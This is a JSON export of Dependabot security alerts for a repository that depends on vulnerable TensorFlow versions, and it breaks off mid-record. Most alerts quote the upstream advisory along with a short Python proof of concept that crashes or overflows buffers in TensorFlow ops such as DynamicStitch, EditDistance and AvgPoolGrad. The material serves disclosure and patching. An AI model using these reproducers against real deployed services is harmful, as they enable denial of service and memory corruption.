[
    {
        "number": 385,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-h6q3-vv32-2cq5",
            "cve_id": "CVE-2022-41894",
            "summary": "Buffer overflow in `CONV_3D_TRANSPOSE` on TFLite",
            "description": "### Impact\nThe reference kernel of the [`CONV_3D_TRANSPOSE`](https://github.com/tensorflow/tensorflow/blob/091e63f0ea33def7ecad661a5ac01dcafbafa90b/tensorflow/lite/kernels/internal/reference/conv3d_transpose.h#L121) TensorFlow Lite operator wrongly increments the data_ptr when adding the bias to the result.\n\nInstead of `data_ptr += num_channels;` it should be `data_ptr += output_num_channels;` as if the number of input channels is different than the number of output channels, the wrong result will be returned and a buffer overflow will occur if num_channels > output_num_channels.\n\nAn attacker can craft a model with a specific number of input channels in a way similar to the attached example script. It is then possible to write specific values through the bias of the layer outside the bounds of the buffer. This attack only works if the reference kernel resolver is used in the interpreter (i.e. `experimental_op_resolver_type=tf.lite.experimental.OpResolverType.BUILTIN_REF` is used).\n```python\nimport tensorflow as tf\nmodel = tf.keras.Sequential(\n    [\n        tf.keras.layers.InputLayer(input_shape=(2, 2, 2, 1024), batch_size=1),\n        tf.keras.layers.Conv3DTranspose(\n            filters=8,\n            kernel_size=(2, 2, 2),\n            padding=\"same\",\n            data_format=\"channels_last\",\n        ),\n    ]\n)\n\nconverter = tf.lite.TFLiteConverter.from_keras_model(model)\ntflite_model = converter.convert()\n\ninterpreter = tf.lite.Interpreter(\n    model_content=tflite_model,\n    experimental_op_resolver_type=tf.lite.experimental.OpResolverType.BUILTIN_REF,\n)\n\ninterpreter.allocate_tensors()\ninterpreter.set_tensor(\n    interpreter.get_input_details()[0][\"index\"], tf.zeros(shape=[1, 2, 2, 2, 1024])\n)\ninterpreter.invoke()\n```\n\n### Patches\nWe have patched the issue in GitHub commit [72c0bdcb25305b0b36842d746cc61d72658d2941](https://github.com/tensorflow/tensorflow/commit/72c0bdcb25305b0b36842d746cc61d72658d2941).\n\nThe fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by Thibaut Goetghebuer-Planchon, Arm Ltd.\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-h6q3-vv32-2cq5",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2022-41894",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h6q3-vv32-2cq5"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41894"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/72c0bdcb25305b0b36842d746cc61d72658d2941"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/blob/091e63f0ea33def7ecad661a5ac01dcafbafa90b/tensorflow/lite/kernels/internal/reference/conv3d_transpose.h#L121"
                },
                {
                    "url": "https://github.com/advisories/GHSA-h6q3-vv32-2cq5"
                }
            ],
            "published_at": "2022-11-21T20:44:24Z",
            "updated_at": "2023-04-10T19:02:13Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.8.4",
                    "first_patched_version": {
                        "identifier": "2.8.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": ">= 2.9.0, < 2.9.3",
                    "first_patched_version": {
                        "identifier": "2.9.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": ">= 2.10.0, < 2.10.1",
                    "first_patched_version": {
                        "identifier": "2.10.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
                "score": 7.1
            },
            "cwes": [
                {
                    "cwe_id": "CWE-120",
                    "name": "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.8.4",
            "first_patched_version": {
                "identifier": "2.8.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/385",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/385",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 384,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-fxgc-95xx-grvq",
            "cve_id": "CVE-2023-25661",
            "summary": "TensorFlow Denial of Service vulnerability",
            "description": "### Impact\nA malicious invalid input crashes a tensorflow model (Check Failed) and can be used to trigger a denial of service attack.\nTo minimize the bug, we built a simple single-layer TensorFlow model containing a Convolution3DTranspose layer, which works well with expected inputs and can be deployed in real-world systems. However, if we call the model with a malicious input which has a zero dimension, it gives Check Failed failure and crashes. \n```python\nimport tensorflow as tf\n\nclass MyModel(tf.keras.Model):\n    def __init__(self):\n        super().__init__()\n        self.conv = tf.keras.layers.Convolution3DTranspose(2, [3,3,3], padding=\"same\")\n        \n    def call(self, input):\n        return self.conv(input)\nmodel = MyModel() # Defines a valid model.\n\nx = tf.random.uniform([1, 32, 32, 32, 3], minval=0, maxval=0, dtype=tf.float32) # This is a valid input.\noutput = model.predict(x)\nprint(output.shape) # (1, 32, 32, 32, 2)\n\nx = tf.random.uniform([1, 32, 32, 0, 3], dtype=tf.float32) # This is an invalid input.\noutput = model(x) # crash\n```\nThis Convolution3DTranspose layer is a very common API in modern neural networks. The ML models containing such vulnerable components could be deployed in ML applications or as cloud services. This failure could be potentially used to trigger a denial of service attack on ML cloud services.\n\n### Patches\nWe have patched the issue in\n- GitHub commit [948fe6369a5711d4b4568ea9bbf6015c6dfb77e2](https://github.com/tensorflow/tensorflow/commit/948fe6369a5711d4b4568ea9bbf6015c6dfb77e2)\n- GitHub commit [85db5d07db54b853484bfd358c3894d948c36baf](https://github.com/keras-team/keras/commit/85db5d07db54b853484bfd358c3894d948c36baf).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n",
            "severity": "medium",
            "identifiers": [
                {
                    "value": "GHSA-fxgc-95xx-grvq",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25661",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fxgc-95xx-grvq"
                },
                {
                    "url": "https://github.com/keras-team/keras/commit/85db5d07db54b853484bfd358c3894d948c36baf"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/948fe6369a5711d4b4568ea9bbf6015c6dfb77e2"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25661"
                },
                {
                    "url": "https://github.com/advisories/GHSA-fxgc-95xx-grvq"
                }
            ],
            "published_at": "2023-03-27T21:05:10Z",
            "updated_at": "2023-09-01T15:23:50Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
                "score": 6.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-20",
                    "name": "Improper Input Validation"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "medium",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/384",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/384",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 383,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-93vr-9q9m-pj8p",
            "cve_id": "CVE-2023-25659",
            "summary": "TensorFlow vulnerable to Out-of-Bounds Read in DynamicStitch",
            "description": "### Impact\nIf the parameter `indices` for `DynamicStitch` does not match the shape of the parameter `data`, it can trigger an stack OOB read.\n\n```python\nimport tensorflow as tf\nfunc = tf.raw_ops.DynamicStitch\npara={'indices': [[0xdeadbeef], [405], [519], [758], [1015]], 'data': [[110.27793884277344], [120.29475402832031], [157.2418212890625], [157.2626953125], [188.45382690429688]]}\ny = func(**para)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [ee004b18b976eeb5a758020af8880236cd707d05](https://github.com/tensorflow/tensorflow/commit/ee004b18b976eeb5a758020af8880236cd707d05).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis has been reported via Google OSS VRP.",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-93vr-9q9m-pj8p",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25659",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-93vr-9q9m-pj8p"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/ee004b18b976eeb5a758020af8880236cd707d05"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25659"
                },
                {
                    "url": "https://github.com/advisories/GHSA-93vr-9q9m-pj8p"
                }
            ],
            "published_at": "2023-03-24T21:58:53Z",
            "updated_at": "2023-03-27T21:26:46Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-125",
                    "name": "Out-of-bounds Read"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/383",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/383",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 382,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-qjqc-vqcf-5qvj",
            "cve_id": "CVE-2023-25660",
            "summary": "TensorFlow vulnerable to seg fault in `tf.raw_ops.Print`",
            "description": "### Impact\nWhen the parameter `summarize` of `tf.raw_ops.Print` is zero, the new method `SummarizeArray<bool>` will reference to a nullptr, leading to a seg fault.\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.Print(input =  tf.constant([1, 1, 1, 1],dtype=tf.int32),\n                            data =  [[False, False, False, False], [False], [False, False, False]],\n                            message =  'tmp/I',\n                            first_n = 100,\n                            summarize = 0)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [6d423b8bcc9aa9f5554dc988c1c16d038b508df1](https://github.com/tensorflow/tensorflow/commit/6d423b8bcc9aa9f5554dc988c1c16d038b508df1).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-qjqc-vqcf-5qvj",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25660",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qjqc-vqcf-5qvj"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/6d423b8bcc9aa9f5554dc988c1c16d038b508df1"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25660"
                },
                {
                    "url": "https://github.com/advisories/GHSA-qjqc-vqcf-5qvj"
                }
            ],
            "published_at": "2023-03-24T21:58:44Z",
            "updated_at": "2023-03-27T21:27:24Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/382",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/382",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 381,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-7jvm-xxmr-v5cw",
            "cve_id": "CVE-2023-25662",
            "summary": "TensorFlow vulnerable to integer overflow in EditDistance",
            "description": "### Impact\nTFversion 2.11.0 //tensorflow/core/ops/array_ops.cc:1067 const Tensor* hypothesis_shape_t = c->input_tensor(2); std::vector<DimensionHandle> dims(hypothesis_shape_t->NumElements() - 1); for (int i = 0; i < dims.size(); ++i) { dims[i] = c->MakeDim(std::max(h_values(i), t_values(i))); }\n\nif hypothesis_shape_t is empty, hypothesis_shape_t->NumElements() - 1 will be integer overflow, and the it will deadlock\n```python\nimport tensorflow as tf\npara={\n    'hypothesis_indices': [[]],\n    'hypothesis_values': ['tmp/'],\n    'hypothesis_shape': [],\n    'truth_indices': [[]],\n    'truth_values': [''],\n    'truth_shape': [],\n    'normalize': False\n    }\ntf.raw_ops.EditDistance(**para)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [08b8e18643d6dcde00890733b270ff8d9960c56c](https://github.com/tensorflow/tensorflow/commit/08b8e18643d6dcde00890733b270ff8d9960c56c).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-7jvm-xxmr-v5cw",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25662",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7jvm-xxmr-v5cw"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/08b8e18643d6dcde00890733b270ff8d9960c56c"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25662"
                },
                {
                    "url": "https://github.com/advisories/GHSA-7jvm-xxmr-v5cw"
                }
            ],
            "published_at": "2023-03-24T21:58:31Z",
            "updated_at": "2023-03-27T21:58:28Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-190",
                    "name": "Integer Overflow or Wraparound"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/381",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/381",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 380,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-64jg-wjww-7c5w",
            "cve_id": "CVE-2023-25663",
            "summary": "TensorFlow has Null Pointer Error in TensorArrayConcatV2",
            "description": "### Impact\nWhen ctx->step_containter() is a null ptr, the Lookup function will be executed with a null pointer.\n```python\nimport tensorflow as tf\ntf.raw_ops.TensorArrayConcatV2(handle=['a', 'b'], flow_in = 0.1, dtype=tf.int32, element_shape_except0=1)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [239139d2ae6a81ae9ba499ad78b56d9b2931538a](https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by Yu Tian",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-64jg-wjww-7c5w",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25663",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-64jg-wjww-7c5w"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25663"
                },
                {
                    "url": "https://github.com/advisories/GHSA-64jg-wjww-7c5w"
                }
            ],
            "published_at": "2023-03-24T21:58:15Z",
            "updated_at": "2023-03-27T21:58:57Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/380",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/380",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 379,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-6hg6-5c2q-7rcr",
            "cve_id": "CVE-2023-25664",
            "summary": "TensorFlow has Heap-buffer-overflow in AvgPoolGrad ",
            "description": "### Impact\n```python\nimport os\nos.environ['TF_ENABLE_ONEDNN_OPTS'] = '0'\nimport tensorflow as tf\nprint(tf.__version__)\nwith tf.device(\"CPU\"):\n    ksize = [1, 40, 128, 1]\n    strides = [1, 128, 128, 30]\n    padding = \"SAME\"\n    data_format = \"NHWC\"\n    orig_input_shape = [11, 9, 78, 9]\n    grad = tf.saturate_cast(tf.random.uniform([16, 16, 16, 16], minval=-128, maxval=129, dtype=tf.int64), dtype=tf.float32)\n    res = tf.raw_ops.AvgPoolGrad(\n        ksize=ksize,\n        strides=strides,\n        padding=padding,\n        data_format=data_format,\n        orig_input_shape=orig_input_shape,\n        grad=grad,\n    )\n```\n\n### Patches\nWe have patched the issue in GitHub commit [ddaac2bdd099bec5d7923dea45276a7558217e5b](https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by <evn@google.com>\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-6hg6-5c2q-7rcr",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25664",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6hg6-5c2q-7rcr"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25664"
                },
                {
                    "url": "https://github.com/advisories/GHSA-6hg6-5c2q-7rcr"
                }
            ],
            "published_at": "2023-03-24T21:58:04Z",
            "updated_at": "2023-03-27T22:00:22Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-120",
                    "name": "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')"
                },
                {
                    "cwe_id": "CWE-122",
                    "name": "Heap-based Buffer Overflow"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/379",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/379",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 378,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-558h-mq8x-7q9g",
            "cve_id": "CVE-2023-25665",
            "summary": "TensorFlow has Null Pointer Error in SparseSparseMaximum",
            "description": "### Impact\nWhen `SparseSparseMaximum` is given invalid sparse tensors as inputs, it can give an NPE. \n\n```python\nimport tensorflow as tf\ntf.raw_ops.SparseSparseMaximum(\n a_indices=[[1]],\n a_values =[ 0.1 ],\n a_shape = [2],\n b_indices=[[]],\n b_values =[2 ],\n b_shape = [2],\n)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [5e0ecfb42f5f65629fd7a4edd6c4afe7ff0feb04](https://github.com/tensorflow/tensorflow/commit/5e0ecfb42f5f65629fd7a4edd6c4afe7ff0feb04).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-558h-mq8x-7q9g",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25665",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-558h-mq8x-7q9g"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/5e0ecfb42f5f65629fd7a4edd6c4afe7ff0feb04"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25665"
                },
                {
                    "url": "https://github.com/advisories/GHSA-558h-mq8x-7q9g"
                }
            ],
            "published_at": "2023-03-24T21:57:25Z",
            "updated_at": "2023-03-27T22:00:49Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
